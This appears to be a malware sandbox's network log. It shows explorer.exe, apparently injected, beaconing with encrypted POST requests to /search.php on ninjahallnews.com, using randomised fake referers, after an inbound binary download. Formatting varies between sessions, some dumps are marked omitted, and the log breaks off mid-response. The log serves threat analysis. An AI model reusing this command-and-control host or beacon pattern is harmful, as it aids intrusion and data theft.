2024-10-08 01:15:19 UTC  8192  IN  Data Raw: 32 30 30 30 0d 0a c7 83 91 ea b4 80 43 43 d2 2a 76 48 28 fa e3 f3 9b 3d 20 10 9a 0e 07 b4 7c 20 db b8 5f 0e 1c e0 7a 74 62 c2 d5 38 50 ab b4 6a a0 56 ed 37 bc 2b 04 79 0c 1b 74 82 e9 04 9a 87 8c 66 71 e2 3a 32 bf 96 aa 85 56 f4 05 fa 48 17 d7 45 b4 74 c3 01 34 c3 54 3e 0c 3d 97 2a 26 cc e0 32 29 5f 8c 55 6d 85 ae 7f c0 d1 7a 0d e9 4b ea fe ab ed 75 74 7c 00 3d e6 71 31 34 c9 ac e6 53 30 c6 87 a5 c8 d7 15 65 b7 c3 61 c3 c5 8f c6 9a c4 80 03 25 d2 d0 09 db b2 89 46 e4 46 0c 7b d6 5d 28 c6 ce 93 0e a0 df 57 0e ee 82 b4 d0 a5 1f 04 45 b4 1f 58 9b 51 6b 96 da 7d 6f 25 58 7f c2 df 99 a3 df 79 d9 ef 51 30 8c 18 69 40 64 fe e0 0e f9 89 96 8f 98 34 d7 8c c5 72 ed 1a ee 52 45 71 1c 08 d3 19 12 f4 68 db 8e ab e2 ad 2e 10 cd bb fe ff 53 78 84 90 47 f0 6e 67 90 52 5f
    Data Ascii: 2000CC*vH(= | _ztb8PjV7+ytfq:2VHEt4T>=*&2)_UmzKut|=q14S0ea%FF{](WEXQk}o%XyQ0i@d4rREqh.SxGngR_
2024-10-08 01:15:19 UTC  6  IN  Data Raw: 97 20 09 6c 1a f8
    Data Ascii: l
2024-10-08 01:15:19 UTC  2  IN  Data Raw: 0d 0a
    Data Ascii:
2024-10-08 01:15:19 UTC  8192  IN  Data Raw: 32 30 30 30 0d 0a c5 1b 8a ab 3f 66 45 20 c9 af 22 2e ab 70 95 3f 9f 17 d3 11 7d 81 a5 94 ec 3b f9 58 d1 55 e2 90 08 70 1a b8 60 26 7d 78 86 82 bc 9a 1b 61 79 3c 97 58 14 89 26 5c 44 88 a6 3d 96 1c 53 26 00 44 58 49 1b e8 f1 aa 9a db 4e 9f 66 5f 7d b0 b3 fc 57 ca ff 71 25 4f 88 ed 70 0f 16 b2 c4 bd 0e bf f3 dc 00 b7 f2 a5 f4 ae f3 f6 7a c8 37 8f 60 c1 38 d7 b6 f2 58 0d 76 ba c8 7a a6 13 3a 4c a3 b6 86 b9 a2 0c 4b 37 05 84 09 ed 08 4f 88 07 ea 9a 75 72 15 85 b8 4f 76 61 8c 31 de 65 cd 2a 97 ab 9b 29 53 ae e4 04 d8 0a b1 e7 9c e1 f6 76 b9 e7 13 2d 86 58 56 2e 7e 92 81 b1 d6 bd f7 64 fc 6f c7 85 3a 07 06 fb 78 ed f1 e2 16 f4 a8 e4 e2 30 06 ce 27 25 8a 9d db ba e3 ba 88 e2 96 64 d0 07 8e 10 df c5 fe 4c ef 98 b4 8c 08 a1 01 60 3f 7e ab c0 6c eb 06 f6 63 1f a5
    Data Ascii: 2000?fE ".p?};XUp`&}xay<X&\D=S&DXINf_}Wq%Opz7`8Xvz:LK7OurOva1e*)Sv-XV.~do:x0'%dL`?~lc
2024-10-08 01:15:19 UTC  6  IN  Data Raw: 60 4f 16 27 c7 be
    Data Ascii: `O'
2024-10-08 01:15:19 UTC  2  IN  Data Raw: 0d 0a
    Data Ascii:


Session ID  Source IP    Source Port  Destination IP  Destination Port  PID   Process
2           192.168.2.4  49924        23.145.40.168   443               2580  C:\Windows\explorer.exe

Timestamp  Bytes transferred  Direction  Data
2024-10-08 01:15:20 UTC  288  OUT  POST /search.php HTTP/1.1
    Connection: Keep-Alive
    Content-Type: application/x-www-form-urlencoded
    Accept: */*
    Referer: https://qlmbybhxbuhwwks.org/
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
    Content-Length: 315
    Host: ninjahallnews.com
2024-10-08 01:15:20 UTC  315  OUT  Data Raw: 72 19 83 cf 8b 06 16 8e 6d 81 e8 68 39 f0 18 2f d1 f2 b9 a2 17 0a 32 f3 70 07 c7 95 ea d5 36 ef 0f 9c b9 84 06 fd db 86 f3 0f d0 cf e9 20 29 a1 c5 c1 36 49 50 20 67 33 fa a7 84 b4 ec 69 71 0c 18 48 5b dd 40 4c 6a 34 01 83 b7 25 93 3c 6d ab 0f be be cc 49 5b f0 14 66 f8 32 e8 83 03 7a ec 69 32 5b ae e0 94 7f d1 ef 0f 1d e6 e8 63 ea 6f 7c ac e7 52 67 66 45 59 23 c1 2e 80 eb c5 3a e3 82 31 13 26 ab 58 2e bc 66 0b 9f ed e8 97 5b 39 d3 69 e0 2d e8 3b 5d 9d 50 cc 2d 40 79 61 13 bb ab 49 f7 b3 3a 85 1d 2d f1 d6 87 55 ab ae 7e 93 ba ae a8 58 42 86 8a 86 6b 59 8c 7c 4a 98 11 7b 4a bd 26 12 2c a2 17 6a 12 fd db d5 20 3c b6 c9 69 bd 2d f7 c0 cc 7d 17 3c 4b e0 5b 72 70 52 7b e8 31 82 d3 15 3a 6a 7c 5e f0 8e 6e 60 0c 44 95 fc ee 24 96 e9 00 82 55 d0 f6 a8 c1 08 b2 5a
    Data Ascii: rmh9/2p6 )6IP g3iqH[@Lj4%<mI[f2zi2[co|RgfEY#.:1&X.f[9i-;]P-@yaI:-U~XBkY|J{J&,j <i-}<K[rpR{1:j|^n`D$UZ
2024-10-08 01:15:21 UTC  278  IN  HTTP/1.1 200 OK
    Date: Tue, 08 Oct 2024 01:15:21 GMT
    Server: Apache/2.4.52 (Ubuntu)
    X-Frame-Options: DENY
    X-Content-Type-Options: nosniff
    X-Frame-Options: DENY
    X-Content-Type-Options: nosniff
    Content-Length: 0
    Content-Type: text/html; charset=utf-8
    Connection: close


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
3 | 192.168.2.4 | 49935 | 23.145.40.168 | 443 | 2580 | C:\Windows\explorer.exe

Timestamp | Bytes transferred | Direction | Data
2024-10-08 01:15:21 UTC | 289 | OUT | POST /search.php HTTP/1.1
Connection: Keep-Alive
Content-Type: application/x-www-form-urlencoded
Accept: */*
Referer: https://dkjcfovkypdsnjsq.com/
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
Content-Length: 276
Host: ninjahallnews.com
2024-10-08 01:15:21 UTC | 276 | OUT | Data Raw / Data Ascii: (276-byte hex dump and its ASCII rendering omitted)
2024-10-08 01:15:22 UTC | 278 | IN | HTTP/1.1 200 OK
Date: Tue, 08 Oct 2024 01:15:22 GMT
Server: Apache/2.4.52 (Ubuntu)
X-Frame-Options: DENY
X-Content-Type-Options: nosniff
X-Frame-Options: DENY
X-Content-Type-Options: nosniff
Content-Length: 0
Content-Type: text/html; charset=utf-8
Connection: close


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
4 | 192.168.2.4 | 49942 | 23.145.40.168 | 443 | 2580 | C:\Windows\explorer.exe

Timestamp | Bytes transferred | Direction | Data
2024-10-08 01:15:23 UTC | 286 | OUT | POST /search.php HTTP/1.1
Connection: Keep-Alive
Content-Type: application/x-www-form-urlencoded
Accept: */*
Referer: https://ifvxyamcogdoh.org/
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
Content-Length: 324
Host: ninjahallnews.com
2024-10-08 01:15:23 UTC | 324 | OUT | Data Raw / Data Ascii: (324-byte hex dump and its ASCII rendering omitted)
2024-10-08 01:15:23 UTC | 278 | IN | HTTP/1.1 200 OK
Date: Tue, 08 Oct 2024 01:15:23 GMT
Server: Apache/2.4.52 (Ubuntu)
X-Frame-Options: DENY
X-Content-Type-Options: nosniff
X-Frame-Options: DENY
X-Content-Type-Options: nosniff
Content-Length: 0
Content-Type: text/html; charset=utf-8
Connection: close


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
5 | 192.168.2.4 | 49951 | 23.145.40.168 | 443 | 2580 | C:\Windows\explorer.exe

Timestamp | Bytes transferred | Direction | Data
2024-10-08 01:15:24 UTC | 285 | OUT | POST /search.php HTTP/1.1
Connection: Keep-Alive
Content-Type: application/x-www-form-urlencoded
Accept: */*
Referer: https://jhsgrosrfeyc.net/
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
Content-Length: 227
Host: ninjahallnews.com
2024-10-08 01:15:24 UTC | 227 | OUT | Data Raw / Data Ascii: (227-byte hex dump and its ASCII rendering omitted)
2024-10-08 01:15:24 UTC | 278 | IN | HTTP/1.1 200 OK
Date: Tue, 08 Oct 2024 01:15:24 GMT
Server: Apache/2.4.52 (Ubuntu)
X-Frame-Options: DENY
X-Content-Type-Options: nosniff
X-Frame-Options: DENY
X-Content-Type-Options: nosniff
Content-Length: 0
Content-Type: text/html; charset=utf-8
Connection: close


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
6 | 192.168.2.4 | 49959 | 23.145.40.168 | 443 | 2580 | C:\Windows\explorer.exe

Timestamp | Bytes transferred | Direction | Data
2024-10-08 01:15:24 UTC | 289 | OUT | POST /search.php HTTP/1.1
Connection: Keep-Alive
Content-Type: application/x-www-form-urlencoded
Accept: */*
Referer: https://snwbetxwxfjxjjcj.org/
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
Content-Length: 213
Host: ninjahallnews.com
2024-10-08 01:15:24 UTC | 213 | OUT | Data Raw / Data Ascii: (213-byte hex dump and its ASCII rendering omitted)
2024-10-08 01:15:25 UTC | 278 | IN | HTTP/1.1 200 OK
Date: Tue, 08 Oct 2024 01:15:25 GMT
Server: Apache/2.4.52 (Ubuntu)
X-Frame-Options: DENY
X-Content-Type-Options: nosniff
X-Frame-Options: DENY
X-Content-Type-Options: nosniff
Content-Length: 0
Content-Type: text/html; charset=utf-8
Connection: close


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
7 | 192.168.2.4 | 49965 | 23.145.40.168 | 443 | 2580 | C:\Windows\explorer.exe

Timestamp | Bytes transferred | Direction | Data
2024-10-08 01:15:25 UTC | 288 | OUT | POST /search.php HTTP/1.1
Connection: Keep-Alive
Content-Type: application/x-www-form-urlencoded
Accept: */*
Referer: https://duxssctxidfvcwn.org/
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
Content-Length: 321
Host: ninjahallnews.com
2024-10-08 01:15:25 UTC | 321 | OUT | Data Raw / Data Ascii: (321-byte hex dump and its ASCII rendering omitted)
2024-10-08 01:15:26 UTC | 278 | IN | HTTP/1.1 200 OK
Date: Tue, 08 Oct 2024 01:15:25 GMT
Server: Apache/2.4.52 (Ubuntu)
X-Frame-Options: DENY
X-Content-Type-Options: nosniff
X-Frame-Options: DENY
X-Content-Type-Options: nosniff
Content-Length: 0
Content-Type: text/html; charset=utf-8
Connection: close


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
8 | 192.168.2.4 | 49971 | 23.145.40.168 | 443 | 2580 | C:\Windows\explorer.exe

Timestamp | Bytes transferred | Direction | Data
2024-10-08 01:15:26 UTC | 287 | OUT | POST /search.php HTTP/1.1
Connection: Keep-Alive
Content-Type: application/x-www-form-urlencoded
Accept: */*
Referer: https://onmervjnyngctx.org/
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
Content-Length: 335
Host: ninjahallnews.com
2024-10-08 01:15:26 UTC | 335 | OUT | Data Raw / Data Ascii: (335-byte hex dump and its ASCII rendering omitted)
2024-10-08 01:15:27 UTC | 278 | IN | HTTP/1.1 200 OK
Date: Tue, 08 Oct 2024 01:15:26 GMT
Server: Apache/2.4.52 (Ubuntu)
X-Frame-Options: DENY
X-Content-Type-Options: nosniff
X-Frame-Options: DENY
X-Content-Type-Options: nosniff
Content-Length: 0
Content-Type: text/html; charset=utf-8
Connection: close


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
9 | 192.168.2.4 | 49977 | 23.145.40.168 | 443 | 2580 | C:\Windows\explorer.exe

Timestamp | Bytes transferred | Direction | Data
2024-10-08 01:15:27 UTC | 289 | OUT | POST /search.php HTTP/1.1
Connection: Keep-Alive
Content-Type: application/x-www-form-urlencoded
Accept: */*
Referer: https://gapeuqmkxloigpbr.com/
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
Content-Length: 232
Host: ninjahallnews.com
2024-10-08 01:15:27 UTC | 232 | OUT | Data Raw / Data Ascii: (232-byte hex dump and its ASCII rendering omitted)
                                                                                                                                      2024-10-08 01:15:27 UTC278INHTTP/1.1 200 OK
                                                                                                                                      Date: Tue, 08 Oct 2024 01:15:27 GMT
                                                                                                                                      Server: Apache/2.4.52 (Ubuntu)
                                                                                                                                      X-Frame-Options: DENY
                                                                                                                                      X-Content-Type-Options: nosniff
                                                                                                                                      X-Frame-Options: DENY
                                                                                                                                      X-Content-Type-Options: nosniff
                                                                                                                                      Content-Length: 0
                                                                                                                                      Content-Type: text/html; charset=utf-8
                                                                                                                                      Connection: close


Session ID: 10 | Source IP: 192.168.2.4 | Source Port: 49983 | Destination IP: 23.145.40.168 | Destination Port: 443 | PID: 2580 | Process: C:\Windows\explorer.exe

Timestamp | Bytes transferred | Direction | Data
2024-10-08 01:15:28 UTC | 286 | OUT | POST /search.php HTTP/1.1
Connection: Keep-Alive
Content-Type: application/x-www-form-urlencoded
Accept: */*
Referer: https://toeqqmleovvia.net/
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
Content-Length: 352
Host: ninjahallnews.com
2024-10-08 01:15:28 UTC | 352 | OUT | Data Raw: 72 19 83 cf 8b 06 16 8e 6d 81 e8 68 39 f0 18 2f d1 f2 b9 a2 17 0a 32 f3 70 07 c7 95 ea d5 36 ef 0f 9c b9 84 06 fd db 86 f3 0f d0 cf e9 20 29 a1 c5 c1 36 49 50 20 67 33 fa a7 84 b4 ec 69 71 0c 18 48 5b dd 40 4c 63 34 01 83 b7 25 93 3c 2e f8 67 9e a6 fb 41 51 be 72 12 f6 3f c4 ca 2f 29 a7 16 56 40 98 d6 89 70 f0 a6 70 69 c4 f0 27 92 71 36 e1 9a 05 16 4d 17 07 23 e0 3e bf f4 8c 48 f5 b8 6d 68 29 f1 10 0c fe 3b 7c f3 fe ad 81 5b 14 9a 1b b2 2a b8 36 5a ba 39 bd 4b 42 4b 2f 03 d2 dc 1a 93 a4 07 d7 26 08 f1 a2 81 1c b2 a6 5b f1 dd 85 90 40 28 9f 92 b2 0c 20 ca 70 5d 99 78 12 39 95 4f 35 2d c2 21 37 30 d5 a6 d7 6e 7f bf ab 78 9b 67 e7 be bd 25 76 10 78 ba 1b 6d 60 1a 22 e9 3e f3 85 28 1d 2c 2a 58 e0 e0 33 2b 22 33 ac d7 d3 20 ca b2 2b 9c 21 df e9 f3 cc 0d a9 2e
Data Ascii: rmh9/2p6 )6IP g3iqH[@Lc4%<.gAQr?/)V@ppi'q6M#>Hmh);|[*6Z9KBK/&[@( p]x9O5-!70nxg%vxm`">(,*X3+"3 +!.
2024-10-08 01:15:28 UTC | 278 | IN | HTTP/1.1 200 OK
Date: Tue, 08 Oct 2024 01:15:28 GMT
Server: Apache/2.4.52 (Ubuntu)
X-Frame-Options: DENY
X-Content-Type-Options: nosniff
X-Frame-Options: DENY
X-Content-Type-Options: nosniff
Content-Length: 0
Content-Type: text/html; charset=utf-8
Connection: close


Session ID: 11 | Source IP: 192.168.2.4 | Source Port: 49989 | Destination IP: 23.145.40.168 | Destination Port: 443 | PID: 2580 | Process: C:\Windows\explorer.exe

Timestamp | Bytes transferred | Direction | Data
2024-10-08 01:15:29 UTC | 286 | OUT | POST /search.php HTTP/1.1
Connection: Keep-Alive
Content-Type: application/x-www-form-urlencoded
Accept: */*
Referer: https://bqjkmpxvvpbja.com/
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
Content-Length: 345
Host: ninjahallnews.com
2024-10-08 01:15:29 UTC | 345 | OUT | Data Raw: 72 19 83 cf 8b 06 16 8e 6d 81 e8 68 39 f0 18 2f d1 f2 b9 a2 17 0a 32 f3 70 07 c7 95 ea d5 36 ef 0f 9c b9 84 06 fd db 86 f3 0f d0 cf e9 20 29 a1 c5 c1 36 49 50 20 67 33 fa a7 84 b4 ec 69 71 0c 18 48 5b dd 40 4c 60 34 01 83 b7 25 93 3c 62 bd 02 94 a4 e5 51 2a c6 08 38 9c 5f 91 ea 74 60 a0 01 4e 75 bb cd ec 68 e0 c3 0c 59 82 a5 28 ee 21 76 b2 90 53 2d 7b 5e 21 21 f9 7c b5 d7 af 32 f9 91 3d 7d 06 83 1d 3b d2 3c 64 c6 c2 ba 9a 0f 3b b7 45 b5 5f e7 15 69 bf 5f 90 4a 2b 46 35 6b c9 af 62 ee bd 02 f7 40 26 d5 c1 be 43 f3 89 77 8f cf a7 b7 4a 4d 9f 8d cc 4d 5b 94 14 06 c9 1a 49 43 f3 73 12 2c f9 22 09 2f 84 8e f7 07 33 bc e6 00 9a 24 f1 f6 db 0c 31 3d 4e f1 64 26 5b 0b 2f bd 15 f3 ad 04 0d 28 67 29 81 e2 5e 66 41 28 a1 c1 cc 31 d5 ef 13 91 49 9e e1 e7 88 02 c8 62
Data Ascii: rmh9/2p6 )6IP g3iqH[@L`4%<bQ*8_t`NuhY(!vS-{^!!|2=};<d;E_i_J+F5kb@&CwJMM[ICs,"/3$1=Nd&[/(g)^fA(1Ib
2024-10-08 01:15:29 UTC | 278 | IN | HTTP/1.1 200 OK
Date: Tue, 08 Oct 2024 01:15:29 GMT
Server: Apache/2.4.52 (Ubuntu)
X-Frame-Options: DENY
X-Content-Type-Options: nosniff
X-Frame-Options: DENY
X-Content-Type-Options: nosniff
Content-Length: 0
Content-Type: text/html; charset=utf-8
Connection: close


Session ID: 12 | Source IP: 192.168.2.4 | Source Port: 49995 | Destination IP: 23.145.40.168 | Destination Port: 443 | PID: 2580 | Process: C:\Windows\explorer.exe

Timestamp | Bytes transferred | Direction | Data
2024-10-08 01:15:30 UTC | 288 | OUT | POST /search.php HTTP/1.1
Connection: Keep-Alive
Content-Type: application/x-www-form-urlencoded
Accept: */*
Referer: https://jesubehqcutadrf.net/
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
Content-Length: 358
Host: ninjahallnews.com
2024-10-08 01:15:30 UTC | 358 | OUT | Data Raw: 72 19 83 cf 8b 06 16 8e 6d 81 e8 68 39 f0 18 2f d1 f2 b9 a2 17 0a 32 f3 70 07 c7 95 ea d5 36 ef 0f 9c b9 84 06 fd db 86 f3 0f d0 cf e9 20 29 a1 c5 c1 36 49 50 20 67 33 fa a7 84 b4 ec 69 71 0c 18 48 5b dd 40 4c 61 34 01 83 b7 25 93 3c 46 c4 20 e6 b8 c6 43 24 ba 07 32 b5 28 9f f4 3b 72 c4 34 3b 77 d4 ee d0 2b f0 c6 40 68 e7 ef 21 b0 6b 2a a2 dd 72 1b 7e 12 12 0e c7 1b d3 91 b8 55 90 9b 70 77 4e 9b 67 16 b9 2e 0d 94 c4 8b 81 20 10 9a 66 be 64 ba 76 28 b4 26 99 58 37 3a 25 14 bb b4 77 95 b1 76 d2 36 07 8c cb dc 1c a7 fa 01 e1 8c b7 82 21 4c 95 b9 bf 64 1a d6 0f 04 e8 2f 12 16 e3 3e 67 40 de 55 66 09 d8 90 e9 0a 51 8f a3 11 af 4e 9a af b2 06 3c 2a 6d f3 43 71 68 1f 6e cc 0f ef a1 06 4a 21 78 18 f0 89 5f 68 5e 40 bd f4 d9 22 9a d2 32 f7 3e 95 84 c5 86 02 9f 57
Data Ascii: rmh9/2p6 )6IP g3iqH[@La4%<F C$2(;r4;w+@h!k*r~UpwNg. fdv(&X7:%wv6!Ld/>g@UfQN<*mCqhnJ!x_h^@"2>W
2024-10-08 01:15:30 UTC | 278 | IN | HTTP/1.1 200 OK
Date: Tue, 08 Oct 2024 01:15:30 GMT
Server: Apache/2.4.52 (Ubuntu)
X-Frame-Options: DENY
X-Content-Type-Options: nosniff
X-Frame-Options: DENY
X-Content-Type-Options: nosniff
Content-Length: 0
Content-Type: text/html; charset=utf-8
Connection: close


Session ID: 13 | Source IP: 192.168.2.4 | Source Port: 50001 | Destination IP: 23.145.40.168 | Destination Port: 443 | PID: 2580 | Process: C:\Windows\explorer.exe

Timestamp | Bytes transferred | Direction | Data
2024-10-08 01:15:31 UTC | 284 | OUT | POST /search.php HTTP/1.1
Connection: Keep-Alive
Content-Type: application/x-www-form-urlencoded
Accept: */*
Referer: https://morbrftngjk.com/
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
Content-Length: 291
Host: ninjahallnews.com
2024-10-08 01:15:31 UTC | 291 | OUT | Data Raw: 72 19 83 cf 8b 06 16 8e 6d 81 e8 68 39 f0 18 2f d1 f2 b9 a2 17 0a 32 f3 70 07 c7 95 ea d5 36 ef 0f 9c b9 84 06 fd db 86 f3 0f d0 cf e9 20 29 a1 c5 c1 36 49 50 20 67 33 fa a7 84 b4 ec 69 71 0c 18 48 5b dd 40 4c 66 34 01 83 b7 25 93 3c 4a a3 0a b0 c7 b5 14 31 d4 29 34 e1 74 ca c7 70 3e bf 68 5b 5a b0 dd d6 4f e4 e5 10 7c 8e f6 44 fe 3d 30 8b f1 1c 17 44 65 21 02 ff 03 a2 e8 8a 4a 9d e6 44 75 19 98 7b 18 ab 36 6f ec 90 be 82 0f 05 b7 50 cc 22 93 3d 57 cc 1d d7 40 39 56 65 68 ab f7 48 8c de 01 d1 30 78 ff c5 8c 1d ba 83 5b 8e a0 e7 a6 46 63 be 92 a3 43 20 bb 41 0c 9c 2e 4f 0d bc 29 72 74 ef 2e 31 08 ea 8b c6 07 3b c5 a5 1d bc 35 fb cd cf 67 7a 27 58 ac 68 11 5f 32 39 a3 51 e6 bd 04 29 69 42 2f c8 80 64 7a 43 04 8b 84 f1 19 c8 d4 63 d9 64 cd b6 af a8 52 d0 43
Data Ascii: rmh9/2p6 )6IP g3iqH[@Lf4%<J1)4tp>h[ZO|D=0De!JDu{6oP"=W@9VehH0x[FcC A.O)rt.1;5gz'Xh_29Q)iB/dzCcdRC
2024-10-08 01:15:31 UTC | 278 | IN | HTTP/1.1 200 OK
Date: Tue, 08 Oct 2024 01:15:31 GMT
Server: Apache/2.4.52 (Ubuntu)
X-Frame-Options: DENY
X-Content-Type-Options: nosniff
X-Frame-Options: DENY
X-Content-Type-Options: nosniff
Content-Length: 0
Content-Type: text/html; charset=utf-8
Connection: close


Session ID: 14 | Source IP: 192.168.2.4 | Source Port: 50008 | Destination IP: 23.145.40.168 | Destination Port: 443 | PID: 2580 | Process: C:\Windows\explorer.exe

Timestamp | Bytes transferred | Direction | Data
2024-10-08 01:15:32 UTC | 284 | OUT | POST /search.php HTTP/1.1
Connection: Keep-Alive
Content-Type: application/x-www-form-urlencoded
Accept: */*
Referer: https://shalkugnmyu.org/
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
Content-Length: 341
Host: ninjahallnews.com
2024-10-08 01:15:32 UTC | 341 | OUT | Data Raw: 72 19 83 cf 8b 06 16 8e 6d 81 e8 68 39 f0 18 2f d1 f2 b9 a2 17 0a 32 f3 70 07 c7 95 ea d5 36 ef 0f 9c b9 84 06 fd db 86 f3 0f d0 cf e9 20 29 a1 c5 c1 36 49 50 20 67 33 fa a7 84 b4 ec 69 71 0c 18 48 5b dd 40 4c 67 34 01 83 b7 25 93 3c 49 c2 0f 92 b6 ab 46 35 de 1b 0c 90 2d f5 e3 7b 72 df 2f 56 20 cb a7 8e 3b a5 ae 57 0b f8 9a 63 9d 4a 5d 8f e1 7c 2e 48 4f 3b 31 e4 2e c8 d1 ce 32 fa fa 2e 27 32 e6 43 22 e0 54 7f 88 e7 9b bf 04 6c a3 70 d2 6a f1 66 65 b9 13 d1 31 7f 41 3c 11 cb af 6d ec 91 38 df 36 71 d7 cc c8 3d a5 99 79 80 9a 95 cc 0c 55 90 b1 b2 4c 46 af 4e 36 f3 62 4b 2d bf 23 75 63 d3 34 72 4a ef 91 83 6d 35 c4 e1 0a ea 63 f2 f0 d5 07 31 15 3e f3 03 73 4f 06 7f d8 51 9e a4 0c 48 79 37 07 88 b3 73 5e 01 2d 8f cb 9d 1c 9f f9 6c d7 29 d0 b5 ed 86 12 b7 5c
Data Ascii: rmh9/2p6 )6IP g3iqH[@Lg4%<IF5-{r/V ;WcJ]|.HO;1.2.'2C"Tlpjfe1A<m86q=yULFN6bK-#uc4rJm5c1>sOQHy7s^-l)\
2024-10-08 01:15:32 UTC | 278 | IN | HTTP/1.1 200 OK
Date: Tue, 08 Oct 2024 01:15:32 GMT
Server: Apache/2.4.52 (Ubuntu)
X-Frame-Options: DENY
X-Content-Type-Options: nosniff
X-Frame-Options: DENY
X-Content-Type-Options: nosniff
Content-Length: 0
Content-Type: text/html; charset=utf-8
Connection: close


Session ID: 15 | Source IP: 192.168.2.4 | Source Port: 50015 | Destination IP: 23.145.40.168 | Destination Port: 443 | PID: 2580 | Process: C:\Windows\explorer.exe

Timestamp | Bytes transferred | Direction | Data
2024-10-08 01:15:33 UTC | 288 | OUT | POST /search.php HTTP/1.1
Connection: Keep-Alive
Content-Type: application/x-www-form-urlencoded
Accept: */*
Referer: https://ubaoujicoyurcry.org/
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
Content-Length: 287
Host: ninjahallnews.com
2024-10-08 01:15:33 UTC | 287 | OUT | Data Raw: 72 19 83 cf 8b 06 16 8e 6d 81 e8 68 39 f0 18 2f d1 f2 b9 a2 17 0a 32 f3 70 07 c7 95 ea d5 36 ef 0f 9c b9 84 06 fd db 86 f3 0f d0 cf e9 20 29 a1 c5 c1 36 49 50 20 67 33 fa a7 84 b4 ec 69 71 0c 18 48 5b dd 40 4c 64 34 01 83 b7 25 93 3c 4d d1 17 a0 cb de 32 00 dd 33 03 b3 58 85 f6 2f 22 e1 05 3d 27 c7 c5 8e 76 a4 aa 7d 6a f0 89 35 b6 42 29 ad 86 79 0f 2f 7a 44 18 87 7a cc e3 a8 46 8e a9 3d 26 45 8f 16 5c e6 2a 55 97 88 ee 9b 49 6b 99 61 ae 2d bf 74 20 d3 2c ae 2e 54 65 77 56 c1 de 44 82 ce 02 fa 15 22 98 c8 c5 13 d8 9b 71 9f b2 9f a0 03 4e a4 a5 bb 42 5c a2 56 1c fd 06 76 2a e0 4e 6a 2d bb 2c 1d 1d c0 c3 9f 7b 7a c7 dd 3a 96 47 c9 c1 c3 32 3b 72 5a a1 79 3f 6e 37 75 ea 0b fc 80 09 40 22 5b 5b 88 f0 51 51 38 4f b7 d4 ca 47 f9 f4 71 e7 40 8a 9e e0 b9 0d bc 22
Data Ascii: rmh9/2p6 )6IP g3iqH[@Ld4%<M23X/"='v}j5B)y/zDzF=&E\*UIka-t ,.TewVD"qNB\Vv*Nj-,{z:G2;rZy?n7u@"[[QQ8OGq@"
2024-10-08 01:15:33 UTC | 278 | IN | HTTP/1.1 200 OK
Date: Tue, 08 Oct 2024 01:15:33 GMT
Server: Apache/2.4.52 (Ubuntu)
X-Frame-Options: DENY
X-Content-Type-Options: nosniff
X-Frame-Options: DENY
X-Content-Type-Options: nosniff
Content-Length: 0
Content-Type: text/html; charset=utf-8
Connection: close


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
16 | 192.168.2.4 | 50024 | 23.145.40.168 | 443 | 2580 | C:\Windows\explorer.exe
Timestamp | Bytes transferred | Direction | Data
2024-10-08 01:15:33 UTC | 288 | OUT | POST /search.php HTTP/1.1
Connection: Keep-Alive
Content-Type: application/x-www-form-urlencoded
Accept: */*
Referer: https://oriixfynfaeoogt.org/
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
Content-Length: 211
Host: ninjahallnews.com
2024-10-08 01:15:33 UTC | 211 | OUT | Data Raw: 72 19 83 cf 8b 06 16 8e 6d 81 e8 68 39 f0 18 2f d1 f2 b9 a2 17 0a 32 f3 70 07 c7 95 ea d5 36 ef 0f 9c b9 84 06 fd db 86 f3 0f d0 cf e9 20 29 a1 c5 c1 36 49 50 20 67 33 fa a7 84 b4 ec 69 71 0c 18 48 5b dd 40 4c 65 34 01 83 b7 25 93 3c 7f b5 1a 9a bf f6 44 07 f0 6f 3b ac 26 eb e9 20 1b c0 1f 0a 58 c1 c5 e9 2b cc e7 4d 01 ff fc 79 95 74 32 f1 d4 66 70 5c 58 16 51 98 38 ba 82 89 02 d3 b0 4c 6a 24 b5 78 0b d0 2d 51 e3 c1 ab 95 5a 0d c0 1a c6 7f 8d 0b 58 ad 45 8a 6f 77 24 34 07 f7 cc 40 8f 94 79 ee 5d 3f 81 c0 8e 2e fa 83 57 b8 aa a7 a8 22 2c da d5 a5 04 15 9b 11 26 c2 3c 41 1c a6 4b 0a 2e b7 20 29 19 ff a4 80 7f 22 89 b9 2a ea 17
Data Ascii: rmh9/2p6 )6IP g3iqH[@Le4%<Do;& X+Myt2fp\XQ8Lj$x-QZXEow$4@y]?.W",&<AK. )"*
2024-10-08 01:15:34 UTC | 278 | IN | HTTP/1.1 200 OK
Date: Tue, 08 Oct 2024 01:15:34 GMT
Server: Apache/2.4.52 (Ubuntu)
X-Frame-Options: DENY
X-Content-Type-Options: nosniff
X-Frame-Options: DENY
X-Content-Type-Options: nosniff
